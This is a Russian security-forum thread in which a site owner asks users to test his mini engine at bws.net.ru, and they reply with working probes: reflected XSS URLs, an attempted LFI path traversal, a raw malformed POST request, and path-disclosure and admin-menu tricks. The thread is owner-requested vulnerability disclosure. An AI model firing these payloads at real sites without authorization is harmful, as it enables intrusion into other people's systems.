bws.net.ru

bws.net.ru

03.07.2009, 15:40

DECIDE

Новичок

Регистрация: 16.06.2009

Сообщений: 25

С нами: 8896033

Репутация: 1

bws.net.ru

Разработал специальный мини движок для мини комерческих сайтов алянса с единой базой пользователей и платёжной системой на всех сайтах.

нужно проверить на уязвимости

𝕏 Twitter Reddit Telegram Копировать ссылку

04.07.2009, 10:59

Adm1n4eG

Познающий

Регистрация: 27.03.2009

Сообщений: 40

С нами: 9013008

Репутация: 39

http://bws.net.ru/?nvg=office::services"><script>alert()</script>
http://bws.net.ru/?nvg=invest:service"><script>alert()</script>
http://bws.net.ru/?nvg=crline:application"><script>alert()</script>

Последний раз редактировалось Adm1n4eG; 04.07.2009 в 11:33..

05.07.2009, 21:21

DECIDE

Новичок

Регистрация: 16.06.2009

Сообщений: 25

С нами: 8896033

Репутация: 1

спасибо, будет исправлено

06.07.2009, 06:30

Alexandr II

Постоянный

Регистрация: 28.12.2007

Сообщений: 804

С нами: 9668486

Репутация: 1400

PHP код:


		
			
http://www.bws.net.ru/?nvg=office:payment"><script>alert()</script>

их тут куча) + смотри

PHP код:


		
			
http://www.bws.net.ru/?nvg="><script>alert()</script>

админка вылазиет))) с какого боку?))

06.07.2009, 08:51

DECIDE

Новичок

Регистрация: 16.06.2009

Сообщений: 25

С нами: 8896033

Репутация: 1

их там не куча, а просто навигация одним файлом управляется, в нём подправить и всё
ЗЫ. ща исправлю, вчера на дачу ездил устал..

31.12.2009, 17:40

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

С нами: 9846041

Репутация: 1177

http://bws.net.ru/?com=../../../../../../../../../../../../../subscription../../../../../home/decide/domains/bws.net.ru/public_html/index

Я ваще не понял, что у тя там за проверка. Факт в том, что LFI не удался. Скажи, что за проверка, че за нах о_0 :-d

31.12.2009, 17:45

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

С нами: 9846041

Репутация: 1177

PHP код:


		
			
POST http://bws.net.ru/?com=subscription&cmd=add HTTP/1.0

Host: bws.net.ru

UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1

Connection: Close

Content-Type: application/x-www-form-urlencoded

Content-length: 17



eml[1]=loc@root.com

результат:
Warning: preg_match() expects parameter 2 to be string, array given in [path]

31.12.2009, 19:34

~~.Life~~

Banned

Регистрация: 26.12.2009

Сообщений: 152

С нами: 8618486

Репутация: 0

вроде все теперь крикрыл, норм теперь...
но это конешно жеть было...
http://www.bws.net.ru/?nvg="><script>alert()</script>

01.01.2010, 05:41

Belov

Познающий

Регистрация: 04.08.2008

Сообщений: 78

С нами: 9351217

Репутация: 7

http://bws.net.ru/?com=%3C раскрытие путей

#10

05.01.2010, 16:01

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

С нами: 9567480

Репутация: 61

PHP код:


		
			
<select name="nskn[]" onchange=document.getElementById('fskn').submit()><option value="original" selected>original</select>

Пути

PHP код:


		
			
http://bws.net.ru/?nvg[]=invest

В меню вход в админку

PHP код:


		
			
http://bws.net.ru/?com[]=subscription

Пути

Последний раз редактировалось Byrger; 05.01.2010 в 16:04..